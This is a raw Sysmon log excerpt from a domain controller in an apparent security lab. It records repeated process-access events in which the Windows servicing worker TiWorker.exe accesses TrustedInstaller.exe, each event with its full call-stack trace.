12:02:25.885{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006068Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.885{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006067Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.870{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006066Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.870{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006065Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.870{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006064Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.870{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006063Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.870{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006062Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.854{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006061Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.854{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006060Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.854{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006059Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.854{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006058Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.854{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006057Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.838{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006056Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.838{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006055Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.838{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006054Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.823{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006053Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.823{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006052Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.823{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 